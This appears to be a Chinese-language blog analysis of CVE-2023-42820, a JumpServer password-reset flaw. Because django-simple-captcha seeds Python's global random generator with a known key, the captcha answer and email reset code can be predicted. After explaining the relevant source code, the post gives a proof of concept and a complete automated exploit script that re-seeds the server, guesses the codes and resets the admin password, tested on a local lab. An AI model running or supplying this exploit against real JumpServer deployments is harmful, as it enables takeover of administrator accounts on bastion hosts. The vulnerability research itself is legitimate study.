JumpServer 伪随机数密码重置漏洞 (CVE-2023-42820) 分析

JumpServer 伪随机数密码重置漏洞 (CVE-2023-42820) 分析以及自动化利用

漏洞分析

JumpServer <= v3.6.4

首先根据找回密码的地址 /core/auth/password/forget/previewing/ 定位到具体的路由

/apps/authentication/urls/view_urls.py

1
2
3
4
path('password/forget/previewing/', users_view.UserForgotPasswordPreviewingView.as_view(), name='forgot-previewing'),
path('password/forgot/', users_view.UserForgotPasswordView.as_view(), name='forgot-password'),
path('password/reset/', users_view.UserResetPasswordView.as_view(), name='reset-password'),
path('password/verify/', users_view.UserVerifyPasswordView.as_view(), name='user-verify-password'),

/apps/users/views/profile/reset.py

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
# ~*~ coding: utf-8 ~*~

from __future__ import unicode_literals

from django.conf import settings
from django.core.cache import cache
from django.shortcuts import redirect, reverse
from django.urls import reverse_lazy
from django.utils.translation import gettext as _
from django.views.generic import FormView, RedirectView

from common.utils import FlashMessageUtil, get_object_or_none, random_string
from common.utils.verify_code import SendAndVerifyCodeUtil
from users.notifications import ResetPasswordSuccessMsg
from ... import forms
from ...models import User
from ...utils import check_password_rules, get_password_check_rules

__all__ = [
    'UserLoginView',
    'UserResetPasswordView',
    'UserForgotPasswordView',
    'UserForgotPasswordPreviewingView',
]


class UserLoginView(RedirectView):
    url = reverse_lazy('authentication:login')
    query_string = True


class UserForgotPasswordPreviewingView(FormView):
    template_name = 'users/forgot_password_previewing.html'
    form_class = forms.UserForgotPasswordPreviewingForm

    @staticmethod
    def get_redirect_url(token):
        return reverse('authentication:forgot-password') + '?token=%s' % token

    def form_valid(self, form):
        username = form.cleaned_data['username']
        user = get_object_or_none(User, username=username)
        if not user:
            form.add_error('username', _('User does not exist: {}').format(username))
            return super().form_invalid(form)
        if settings.ONLY_ALLOW_AUTH_FROM_SOURCE and not user.is_local:
            error = _('Non-local users can log in only from third-party platforms '
                      'and cannot change their passwords: {}').format(username)
            form.add_error('username', error)
            return super().form_invalid(form)

        token = random_string(36)
        user_map = {'username': user.username, 'phone': user.phone, 'email': user.email}
        cache.set(token, user_map, 5 * 60)
        return redirect(self.get_redirect_url(token))


class UserForgotPasswordView(FormView):
    template_name = 'users/forgot_password.html'
    form_class = forms.UserForgotPasswordForm

    def get(self, request, *args, **kwargs):
        token = self.request.GET.get('token')
        userinfo = cache.get(token)
        if not userinfo:
            return redirect(self.get_redirect_url(return_previewing=True))
        else:
            context = self.get_context_data(has_phone=bool(userinfo['phone']))
            return self.render_to_response(context)

    @staticmethod
    def get_validate_backends_context(has_phone):
        validate_backends = [{'name': _('Email'), 'is_active': True, 'value': 'email'}]
        if settings.XPACK_ENABLED:
            if settings.SMS_ENABLED and has_phone:
                is_active = True
            else:
                is_active = False
            sms_backend = {'name': _('SMS'), 'is_active': is_active, 'value': 'sms'}
            validate_backends.append(sms_backend)
        return {'validate_backends': validate_backends}

    def get_context_data(self, has_phone=False, **kwargs):
        context = super().get_context_data(**kwargs)
        form = context['form']

        cleaned_data = getattr(form, 'cleaned_data', {})
        for k, v in cleaned_data.items():
            if v:
                context[k] = v

        context['form_type'] = 'email'
        context['XPACK_ENABLED'] = settings.XPACK_ENABLED
        validate_backends = self.get_validate_backends_context(has_phone)
        context.update(validate_backends)
        return context

    @staticmethod
    def get_redirect_url(user=None, return_previewing=False):
        if not user and return_previewing:
            return reverse('authentication:forgot-previewing')
        query_params = '?token=%s' % user.generate_reset_token()
        reset_password_url = reverse('authentication:reset-password')
        return reset_password_url + query_params

    def form_valid(self, form):
        token = self.request.GET.get('token')
        userinfo = cache.get(token)
        if not userinfo:
            return redirect(self.get_redirect_url(return_previewing=True))

        username = userinfo.get('username')
        form_type = form.cleaned_data['form_type']
        target = form.cleaned_data[form_type]
        code = form.cleaned_data['code']

        try:
            sender_util = SendAndVerifyCodeUtil(target, backend=form_type)
            sender_util.verify(code)
        except Exception as e:
            form.add_error('code', str(e))
            return super().form_invalid(form)

        query_key = 'phone' if form_type == 'sms' else form_type
        user = get_object_or_none(User, **{'username': username, query_key: target})
        if not user:
            form.add_error('code', _('No user matched'))
            return super().form_invalid(form)

        return redirect(self.get_redirect_url(user))


class UserResetPasswordView(FormView):
    template_name = 'users/reset_password.html'
    form_class = forms.UserTokenResetPasswordForm

    def get(self, request, *args, **kwargs):
        context = self.get_context_data(**kwargs)
        errors = kwargs.get('errors')
        if errors:
            context['errors'] = errors
        return self.render_to_response(context)

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        token = self.request.GET.get('token', '')
        user = User.validate_reset_password_token(token)
        if not user:
            context['errors'] = _('Token invalid or expired')
            context['token_invalid'] = True
        else:
            check_rules = get_password_check_rules(user)
            context['password_check_rules'] = check_rules
        return context

    def form_valid(self, form):
        token = self.request.GET.get('token')
        user = User.validate_reset_password_token(token)
        if not user:
            error = _('Token invalid or expired')
            form.add_error('new_password', error)
            return self.form_invalid(form)

        if not user.can_update_password():
            error = _('User auth from {}, go there change password')
            form.add_error('new_password', error.format(user.get_source_display()))
            return self.form_invalid(form)

        password = form.cleaned_data['new_password']
        is_ok = check_password_rules(password, is_org_admin=user.is_org_admin)
        if not is_ok:
            error = _('* Your password does not meet the requirements')
            form.add_error('new_password', error)
            return self.form_invalid(form)

        if user.is_history_password(password):
            limit_count = settings.OLD_PASSWORD_HISTORY_LIMIT_COUNT
            error = _('* The new password cannot be the last {} passwords').format(
                limit_count
            )
            form.add_error('new_password', error)
            return self.form_invalid(form)

        user.reset_password(password)
        User.expired_reset_password_token(token)

        ResetPasswordSuccessMsg(user, self.request).publish_async()
        url = self.get_redirect_url()
        return redirect(url)

    @staticmethod
    def get_redirect_url():
        message_data = {
            'title': _('Reset password success'),
            'message': _('Reset password success, return to login page'),
            'redirect_url': reverse('authentication:login'),
            'auto_redirect': True,
        }
        return FlashMessageUtil.gen_message_url(message_data)

几个 View 都继承了 Django 的 FormView, 这个是为了方便编写一些表单页面

如果是 GET 请求, 则会直接渲染 template_name 对应的模版

如果是 POST 请求, 则会调用 form_valid 方法对表单数据进行处理

来到 UserForgotPasswordView 视图

这里会实例化 SendAndVerifyCodeUtil 并验证 reset code

抓个包可以发现用于发送邮箱验证码的 API

1
/api/v1/authentication/password/reset-code

/apps/authentication/api/password.py

通过 random_string 生成六位数验证码

函数定义位于 /apps/common/utils/random.py

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# -*- coding: utf-8 -*-
#
import struct
import random
import socket
import string


string_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~'


def random_datetime(date_start, date_end):
    random_delta = (date_end - date_start) * random.random()
    return date_start + random_delta


def random_ip():
    return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))


def random_string(length: int, lower=True, upper=True, digit=True, special_char=False):
    args_names = ['lower', 'upper', 'digit', 'special_char']
    args_values = [lower, upper, digit, special_char]
    args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation]
    args_string_map = dict(zip(args_names, args_string))
    kwargs = dict(zip(args_names, args_values))
    kwargs_keys = list(kwargs.keys())
    kwargs_values = list(kwargs.values())
    args_true_count = len([i for i in kwargs_values if i])
    assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`'
    assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}'

    can_startswith_special_char = args_true_count == 1 and special_char

    chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v])

    while True:
        password = list(random.choice(chars) for i in range(length))
        for k, v in kwargs.items():
            if v and not (set(password) & set(args_string_map[k])):
                # 没有包含指定的字符, retry
                break
        else:
            if not can_startswith_special_char and password[0] in args_string_map['special_char']:
                # 首位不能为特殊字符, retry
                continue
            else:
                # 满足要求终止 while 循环
                break

    password = ''.join(password)
    return password

然后这个漏洞精彩的地方就在于它使用了一个 Django 第三方库的漏洞, 即 django-simple-captcha

这个库在生成图片验证码的时候会全局播种一次, 并且种子已知 (key)

/captcha/views.py

/captcha/urls.py

这里其实有几个注意点, 参考 @漂亮鼠 师傅的文章

  1. JumpServer 使用了 Gunicorn, 会存在多个进程进行处理, 因此需要大量发送数据包来将用于播种的种子覆盖到所有的进程
  2. 播种之后, 包括验证码的生成过程在内, 会有多个地方调用 random 库, 因此我们需要一步一步去手动模拟随机数的生成过程, 这样最终才能计算出正确的 reset code

首先是第一个注意点

这里我本地用 vulhub 的环境测试实际只要发送 10 个左右的数据包即可覆盖成功, 估计可能是我没怎么操作 JumpServer 的功能以及只有本机访问的原因导致进程比较少, 实际环境下还是得大量发送?

然后是第二个注意点

我们得理清楚究竟哪里调用了 random 库, 调用的又分别是库中的哪一个函数, 调用了几次?

先看 django-simple-captcha 的 captcha_image 函数

开头先检查 key 是否位于 CaptchaStore, 然后才会播种

1
2
3
4
5
6
7
8
9
if scale == 2 and not settings.CAPTCHA_2X_IMAGE:
    raise Http404
try:
    store = CaptchaStore.objects.get(hashkey=key)
except CaptchaStore.DoesNotExist:
    # HTTP 410 Gone status so that crawlers don't index these expired urls.
    return HttpResponse(status=410)

random.seed(key)  # Do not generate different images for the same key

往前找可以发现 captcha_refresh 函数

在 JumpServer 中对应的路由为 /core/auth/captcha/refresh/ (手动刷新)

当然实际上在你刚开始进入重置密码的界面时就会生成一次验证码

CaptchaStore.pick()

cls.generate_key()

cls.objects.create 会保存 challenge 和 response, 并返回 store.hashkey

get_challenge 会根据 CAPTCHA_CHALLENGE_FUNCT 参数指定的函数名生成不同形式的验证码

在 JumpServer 中关于 django-simple-captcha 的配置如下

1
2
3
4
5
# Captcha settings, more see https://django-simple-captcha.readthedocs.io/en/latest/advanced.html
CAPTCHA_IMAGE_SIZE = (180, 38)
CAPTCHA_FOREGROUND_COLOR = '#001100'
CAPTCHA_NOISE_FUNCTIONS = ('captcha.helpers.noise_dots',)
CAPTCHA_CHALLENGE_FUNCT = 'captcha.helpers.math_challenge'

找到 math_challenge

随机生成加减乘运算, challenge 代表计算式, response 代表结果 (简单的在 challenge 外面套了个 eval)

那么验证码的构造大致已经清楚了

再从 captcha_image 函数往下看

通过 PIL 操作图像的旋转 (rotate), 这里的随机数我盲猜是个类似于 “旋转角度” 的数字 (

在 django-simple-captcha 的 settings.py 中可以看到这些参数的配置

1
CAPTCHA_LETTER_ROTATION = getattr(settings, "CAPTCHA_LETTER_ROTATION", (-35, 35))

CAPTCHA_LETTER_ROTATION 在 JumpServer 中又没有另外配置, 那么它的默认值即为 (-35, 35)

然后注意上面的代码会遍历 charlist

也就是说如果 charlist 的长度不同, 那么后面调用 random.randrange 的次数也就不同

下面就得关注如何大致确定 charlist 的长度范围

代码往前看

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
text = store.challenge

............

charlist = []
for char in text:
    if char in settings.CAPTCHA_PUNCTUATION and len(charlist) >= 1:
        charlist[-1] += char
    else:
        charlist.append(char)

text (challenge) 也就是验证码的计算式, 后面的 for 会分割 challenge 的内容并放入 charlist

CAPTCHA_PUNCTUATION 的默认值是 _"',.;:-

我们可以简单写个代码测试一下

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
# -*- coding: utf-8 -*-
#
import struct
import random
import socket
import string


string_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~'


def random_datetime(date_start, date_end):
    random_delta = (date_end - date_start) * random.random()
    return date_start + random_delta


def random_ip():
    return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))


def random_string(length: int, lower=True, upper=True, digit=True, special_char=False):
    args_names = ['lower', 'upper', 'digit', 'special_char']
    args_values = [lower, upper, digit, special_char]
    args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation]
    args_string_map = dict(zip(args_names, args_string))
    kwargs = dict(zip(args_names, args_values))
    kwargs_keys = list(kwargs.keys())
    kwargs_values = list(kwargs.values())
    args_true_count = len([i for i in kwargs_values if i])
    assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`'
    assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}'

    can_startswith_special_char = args_true_count == 1 and special_char

    chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v])

    while True:
        password = list(random.choice(chars) for i in range(length))
        for k, v in kwargs.items():
            if v and not (set(password) & set(args_string_map[k])):
                # 没有包含指定的字符, retry
                break
        else:
            if not can_startswith_special_char and password[0] in args_string_map['special_char']:
                # 首位不能为特殊字符, retry
                continue
            else:
                # 满足要求终止 while 循环
                break

    password = ''.join(password)
    return password


def math_challenge():
    operators = ("+", "*", "-")
    operands = (random.randint(1, 10), random.randint(1, 10))
    operator = random.choice(operators)
    if operands[0] < operands[1] and "-" == operator:
        operands = (operands[1], operands[0])
    challenge = "%d%s%d" % (operands[0], operator, operands[1])
    return (
        "{}=".format(challenge),
        str(eval(challenge)),
    )


challenge, response = math_challenge()
text = challenge

CAPTCHA_PUNCTUATION  = """_"',.;:-"""
CAPTCHA_LETTER_ROTATION = (-35, 35)
CAPTCHA_IMAGE_SIZE = (180, 38)

size = CAPTCHA_IMAGE_SIZE

# charlist 长度计算
charlist = []
for char in text:
    if char in CAPTCHA_PUNCTUATION and len(charlist) >= 1:
        charlist[-1] += char
    else:
        charlist.append(char)

print(charlist)

运行几次就会发现 charlist 的长度大致就确定在 3-6 位, 具体规则如下

1
2
3
4
charlist = [1, 1, 1] # 两个个位数 -
charlist = [1, 1, 1, 1] # 两个个位数 + *, 一个十位数一个个位数 -
charlist = [1, 1, 1, 1, 1] # 一个十位数 一个个位数 + *, 两个十位数 -
charlist = [1, 1, 1, 1, 1, 1] # 两个十位数 + *

代码会将 - 和它的前一位拼接, 所以最短的长度是 3

而又因为会出现十位数比如 10, 这里会将它的每一位进行拆分, 因此最大长度是 6

另外, 代码在最后还会对图片进行几次处理

filter_functions 不涉及 random 库的操作

noise_functions 的具体操作需要根据 CAPTCHA_NOISE_FUNCTIONS 的值来确定, 而在 JumpServer 中这个参数的值为 ('captcha.helpers.noise_dots', )

根据 image.size 的值多次调用 random.randint, 这个 size 其实也很好确定

回到 captcha_image

CAPTCHA_IMAGE_SIZE 上文也给出来了, 它的值为 (180, 38)

让我们理一下最终的思路

  1. 首先访问重置密码的页面, 拿到图片验证码的 key
  2. 此时刷新验证码, 然后再输入管理员账号和图片验证码, 进入发送邮箱验证码的页面
  3. 发送一些数据包进行播种
  4. 输入管理员邮箱, 点击 “发送” 按钮
  5. 通过 key 随机预测一些可能的 reset code
  6. 成功修改管理员密码

这里有几个注意点, 不然会利用失败, 其实在 vulhub 的文档中也提到过, 但是没有展开说明

返回第一个 Tab, 刷新页面. 刷新页面的目的是, 不使用包含“种子”的验证码, 因为这个种子将在后续步骤中使用到.

简单来说, 假如我们拿到了一个验证码和它的 key, 那么在输入验证码进入 “发送邮箱验证码的页面” 之后, 这个验证码实际上就已经被销毁了, 返回 HTTP/1.1 410 Gone

也就是说此时的 key 是无效的, 那么我们之后使用这个 key 进行播种的过程实际上也是无效的

解决方法也正如文档所说, 我们刷新一次页面就行, 或者点一次验证码的图片, 让它刷新到一个新的验证码

然后是播种的时间点, 这里其实可以在两个时间点播种

  1. 进入 “发送邮箱验证码的页面” 之前
  2. 进入 “发送邮箱验证码的页面” 之后, 点击发送按钮之前

第二个很好理解, 也就是 vulhub 文档给出的复现过程

但是如果要在第一个时间点播种, 得额外先再生成一次 token, 这样才能计算出正确的 reset code

原因也很简单, 重置密码的初始页面, 即 UserForgotPasswordPreviewingView, 会先调用 random_string 生成一个临时 token, 之后才会走到 reset code 的生成流程

最终 poc

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
# -*- coding: utf-8 -*-
#
import struct
import random
import socket
import string

import requests


string_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~'


def random_datetime(date_start, date_end):
    random_delta = (date_end - date_start) * random.random()
    return date_start + random_delta


def random_ip():
    return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))


def random_string(length: int, lower=True, upper=True, digit=True, special_char=False):
    args_names = ['lower', 'upper', 'digit', 'special_char']
    args_values = [lower, upper, digit, special_char]
    args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation]
    args_string_map = dict(zip(args_names, args_string))
    kwargs = dict(zip(args_names, args_values))
    kwargs_keys = list(kwargs.keys())
    kwargs_values = list(kwargs.values())
    args_true_count = len([i for i in kwargs_values if i])
    assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`'
    assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}'

    can_startswith_special_char = args_true_count == 1 and special_char

    chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v])

    while True:
        password = list(random.choice(chars) for i in range(length))
        for k, v in kwargs.items():
            if v and not (set(password) & set(args_string_map[k])):
                # 没有包含指定的字符, retry
                break
        else:
            if not can_startswith_special_char and password[0] in args_string_map['special_char']:
                # 首位不能为特殊字符, retry
                continue
            else:
                # 满足要求终止 while 循环
                break

    password = ''.join(password)
    return password


def math_challenge():
    operators = ("+", "*", "-")
    operands = (random.randint(1, 10), random.randint(1, 10))
    operator = random.choice(operators)
    if operands[0] < operands[1] and "-" == operator:
        operands = (operands[1], operands[0])
    challenge = "%d%s%d" % (operands[0], operator, operands[1])
    return (
        "{}=".format(challenge),
        str(eval(challenge)),
    )

seed = '53a001ba449f59b0e63545218ddbd20efe961b4b'

for i in range(50):
    res = requests.get('http://127.0.0.1:8080/core/auth/captcha/image/{}/'.format(seed))
    print('i: {} code: {}, len: {}'.format(i, res.status_code, len(res.content)))

random.seed(seed)

CAPTCHA_PUNCTUATION  = """_"',.;:-"""
CAPTCHA_LETTER_ROTATION = (-35, 35)
CAPTCHA_IMAGE_SIZE = (180, 38)

size = CAPTCHA_IMAGE_SIZE

# challenge, response = math_challenge()
# text = challenge

# charlist 长度计算
# charlist = []
# for char in text:
#     if char in CAPTCHA_PUNCTUATION and len(charlist) >= 1:
#         charlist[-1] += char
#     else:
#         charlist.append(char)

# print(charlist)

# 长度 3-6
charlist = [1, 1, 1] # 两个个位数 -
# charlist = [1, 1, 1, 1] # 两个个位数 + *, 一个十位数一个个位数 -
# charlist = [1, 1, 1, 1, 1] # 一个十位数 一个个位数 + *, 两个十位数 -
# charlist = [1, 1, 1, 1, 1, 1] # 两个十位数 + *

# 验证码图片生成时的随机数处理
for char in charlist:
    random.randrange(*CAPTCHA_LETTER_ROTATION)

for p in range(int(size[0] * size[1] * 0.1)):
    random.randint(0, size[0])
    random.randint(0, size[1])

# 预测 reset code
# token = random_string(36)
code = random_string(6, lower=False, upper=False)
print(code)

需要根据 hashkey 对应的验证码图片手工更改 charlist 的长度

自动化利用

这个其实也很好理解, 因为全局的种子可控, 那么我们就可以很方便的去预测验证码的内容

利用过程其实跟 @白帽酱 师傅的文章中提到的过程差不多

大致思路就是先通过第一次访问页面拿到一个验证码的 hashkey, 后续不断利用这个 hashkey 进行播种, 预测验证码和 reset code

注意生成的第一个验证码我们其实是无法预测的, 因为在播种之前就已经调用了一次 math_challenge

但是由于我们后面进行了一次播种, 因此可以在验证码刷新的时候预测第二个验证码的 challenge 和 response

另外, 因为是自动化利用, 所以得解决 charlist 的长度问题

根据验证码的不同, charlist 的长度可能在 3-6 位, 也就是说预测的第二个验证码会有 4 种可能的结果, 后面对应的 reset code 也会有 4 种结果

这里我目前的解决方法是根据 charlist 的不同长度一次性生成所有验证码和 reset code 的值并依次提交, 因为测试中发现连续输错 4 次验证码和 reset code 并不会使它们失效, 即允许少量爆破验证码和 reset code 的请求

最后 Django 自带了一些 csrf 的防范措施, 即 post 页面会有一个隐藏值 csrfmiddlewaretoken, 绕过也很简单, 带着 cookie 先 get 访问一次, 正则匹配 csrf token 然后 post 提交即可

最终 exp

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
# -*- coding: utf-8 -*-
#
import struct
import random
import socket
import string

import requests
import time
import json
import re


string_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~'


def random_datetime(date_start, date_end):
    random_delta = (date_end - date_start) * random.random()
    return date_start + random_delta


def random_ip():
    return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))


def random_string(length: int, lower=True, upper=True, digit=True, special_char=False):
    args_names = ['lower', 'upper', 'digit', 'special_char']
    args_values = [lower, upper, digit, special_char]
    args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation]
    args_string_map = dict(zip(args_names, args_string))
    kwargs = dict(zip(args_names, args_values))
    kwargs_keys = list(kwargs.keys())
    kwargs_values = list(kwargs.values())
    args_true_count = len([i for i in kwargs_values if i])
    assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`'
    assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}'

    can_startswith_special_char = args_true_count == 1 and special_char

    chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v])

    while True:
        password = list(random.choice(chars) for i in range(length))
        for k, v in kwargs.items():
            if v and not (set(password) & set(args_string_map[k])):
                # 没有包含指定的字符, retry
                break
        else:
            if not can_startswith_special_char and password[0] in args_string_map['special_char']:
                # 首位不能为特殊字符, retry
                continue
            else:
                # 满足要求终止 while 循环
                break

    password = ''.join(password)
    return password


def math_challenge():
    operators = ("+", "*", "-")
    operands = (random.randint(1, 10), random.randint(1, 10))
    operator = random.choice(operators)
    if operands[0] < operands[1] and "-" == operator:
        operands = (operands[1], operands[0])
    challenge = "%d%s%d" % (operands[0], operator, operands[1])
    return (
        "{}=".format(challenge),
        str(eval(challenge)),
    )


CAPTCHA_PUNCTUATION  = """_"',.;:-"""
CAPTCHA_LETTER_ROTATION = (-35, 35)
CAPTCHA_IMAGE_SIZE = (180, 38)

size = CAPTCHA_IMAGE_SIZE


# 模拟验证码随机数过程
def captcha_rand(n):
    for char in range(n):
        random.randrange(*CAPTCHA_LETTER_ROTATION)

    for p in range(int(size[0] * size[1] * 0.1)):
        random.randint(0, size[0])
        random.randint(0, size[1])

# 强制播种
def seed_request(hashkey, num):
    for i in range(num):
        res = requests.get('http://127.0.0.1:8080/core/auth/captcha/image/{}/'.format(hashkey))
        print('i: {} code: {} len: {}'.format(i, res.status_code, len(res.content)))


username = 'admin'
email = '[email protected]'

s = requests.Session()

# 拿到 hashkey
res = s.get('http://127.0.0.1:8080/core/auth/password/forget/previewing/')
hashkey = re.findall(r'\"/core/auth/captcha/image/(.*?)/\"', res.text)[0]

# 设置 seed
seed_request(hashkey, 10)

# 刷新验证码
res = s.get('http://127.0.0.1:8080/core/auth/password/forget/previewing/')
captcha_0 = re.findall(r'name=\"captcha_0\" value=\"(.*?)\"', res.text)[0]
csrf_token = re.findall(r'csrfmiddlewaretoken\" value=\"(.*?)\"', res.text)[0]

# 预测验证码
for i in range(3, 7):
    random.seed(hashkey)
    captcha_rand(i)
    _, response = math_challenge()
    print('trying captcha code: {}'.format(response))

    data = {
        'csrfmiddlewaretoken': csrf_token,
        'username': username,
        'captcha_0': captcha_0,
        'captcha_1': response
    }
    res = s.post('http://127.0.0.1:8080/core/auth/password/forget/previewing/', data=data, allow_redirects=False)

    if res.status_code == 302:
        break

if 'Location' not in res.headers:
    print(res.status_code)
    print(res.headers)
    print(res.text)
    exit()

token = res.headers['Location'].split('?token=')[1]
print('token: {}'.format(token))

# 进入邮箱验证码发送页面
res = s.get('http://127.0.0.1:8080/core/auth/password/forgot/?token={}'.format(token))
csrf_token = re.findall(r'csrfmiddlewaretoken\" value=\"(.*?)\"', res.text)[0]

# 再次设置 seed
seed_request(hashkey, 10)

# 发送验证码
res = requests.post('http://127.0.0.1:8080/api/v1/authentication/password/reset-code/?token={}'.format(token), data=json.dumps({
    'form_type': 'email',
    'email': email,
    'sms': '',
}), headers={'Content-Type': 'application/json'})

# 预测邮箱验证码
for i in range(3, 7):
    random.seed(hashkey)
    captcha_rand(i)
    code = random_string(6, lower=False, upper=False)
    print('trying reset code: {}'.format(code))

    data = {
        'csrfmiddlewaretoken': csrf_token,
        'form_type': 'email',
        'email': email,
        'sms': '',
        'code': code
    }
    res = s.post('http://127.0.0.1:8080/core/auth/password/forgot/?token={}'.format(token), data=data, allow_redirects=False)
    if res.status_code == 302:
        break

if 'Location' not in res.headers:
    print(res.status_code)
    print(res.headers)
    print(res.text)
    exit()

token = res.headers['Location'].split('?token=')[1]
print('token: {}'.format(token))

# 进入密码重置页面
res = s.get('http://127.0.0.1:8080/core/auth/password/reset/?token={}'.format(token))
csrf_token = re.findall(r'csrfmiddlewaretoken\" value=\"(.*?)\"', res.text)[0]

def generate_password(n):
    random.seed(time.time())
    return ''.join(random.choice(string.ascii_letters) for i in range(n))

password = generate_password(12)

data = {
    'csrfmiddlewaretoken': csrf_token,
    'new_password': password,
    'confirm_password': password
}

# 重置密码
res = s.post('http://127.0.0.1:8080/core/auth/password/reset/?token={}'.format(token), data=data)

if '重置密码成功' in res.text:
    print('reset password success')
    print('username: {}, email: {}, new password: {}'.format(username, email, password))
else:
    print('reset password failed')
    print(res.text)
0%